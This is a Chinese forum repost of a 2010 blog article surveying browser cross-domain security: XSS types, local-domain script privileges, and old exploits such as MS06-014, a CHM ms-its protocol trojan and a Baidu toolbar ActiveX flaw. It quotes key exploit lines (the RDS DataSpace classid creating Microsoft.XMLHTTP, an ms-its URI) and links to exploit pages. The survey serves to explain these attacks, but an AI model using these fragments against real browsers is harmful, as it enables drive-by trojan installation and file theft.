找回密码
 注册
搜索
热搜: 超星 读书 找书
查看: 261|回复: 0

[【推荐】] 浏览器的跨域安全问题

[复制链接]
发表于 2010-2-8 23:55:39 | 显示全部楼层 |阅读模式
http://aoding.blog.51cto.com/226250/275451

浏览器的安全发展方向
现在浏览器安全的噱头:防钓鱼、防恶意脚本、防溢出型网页木马。
目前薄弱的一块:跨站脚本漏洞、跨域脚本漏洞
未来的浏览器对于跨域安全的加强升级将是一个重点发展方向。
补充: IE8 开始添加 XSS Filter 功能 和跨域安全函数 toStaticHTML () 等。

跨站和跨域漏洞的区别
跨站漏洞是 WEB 程序的漏洞,黑客可以在远程的站点域内任意页面写入脚本内容运行。
跨域漏洞是浏览器的漏洞 ,黑客可以在本地域、远程域获得相应的权限,然后利用得到的权限运行脚本发起攻击。

跨站脚本漏洞的本质
持久型 XSS
非持久型 XSS
DOM XSS
从 IE8 的安全更新可以看出,虽然 XSS 漏洞是 WEB 程序漏洞,但仍属于浏览器的跨域安全问题范围。

跨站脚本漏洞能做到什么
传统的跨站脚本漏洞,劫持用户和 WEB 程序之间的会话或钓鱼攻击。
跨站脚本漏洞是跨域脚本漏洞的一个子集,浏览器底层接口对于同一个域内的脚本安全限制很小,可以导致跨页面的脚本注入。

本地域的脚本权限
本地域的脚本权限按文件的权限分为两种:可执行文件权限和 HTML 文档权限。
HTML 文档权限可以使用 XmlHttp 对象读取本地的任意文件,利用系统的安全特性可以运行本地任意可执行文件。
HTA,VBS 等可执行文件权限可以使用 WshShell 对象等做任何事情。

跨域漏洞的本质
1.Ms06014 漏洞 ,利用 DataSpace 对象 , 获取了本地域可执行文件权限运行脚本。
2.CHM 木马,利用浏览器协议漏洞,获取本地域 HTML 文档权限运行木马。
3. 百度超级搜霸漏洞, ActiveX 组件设计没有考虑域安全。
4. 利用软件的设计缺陷或者浏览器漏洞,在本地域的 HTML 文档注入脚本运行,获取相应的权限。

Ms06014 漏洞
http://www.milw0rm.com/exploits/2052
漏洞关键:
df.setAttribute \"classid\", \"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\"
str=\"Microsoft.XMLHTTP“
Set x = df.CreateObject(str,\"\")

CHM 木马
http://www.securityfocus.com/bid/9658/exploit
IE 未名 CHM 协议漏洞
ms-its:mhtml:file://C:ss.MHT!http://www.example.com//chm.chm::/files/launch.htm
mkMSITStore: mk-its: its: 等帮助文件协议存在跨域漏洞。

百度超级搜霸漏洞
http://www.xfocus.net/articles/200708/933.html
ActiveX 组件设计没有考虑域安全,使用组件自身的 UPDATE 功能,下载运行木马。

IE6 0DAY 和第三方浏览器跨域漏洞
IE6 0DAY
IE 内核的安全接口对伪协议的限制有疏漏。
第三方浏览器跨域漏洞
软件自身的设计或功能出现缺陷。
演示跨域漏洞导致的浏览器劫持攻击。

总结
现在浏览器还没能防住所有的跨域攻击。
1. 跨站攻击脚本非传统的恶意脚本。
2. 浏览器底层接口漏洞,大部分都是 0DAY 漏洞。
3. 第三方浏览器设计上的疏漏导致的安全问题。
4. 部分问题不被重视,还未达到大规模的利用程度。

看到了不管噱头再多,在高手面前,普通的浏览器还是漏洞百出的……
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|网上读书园地

GMT+8, 2024-11-19 00:49 , Processed in 0.230810 second(s), 19 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表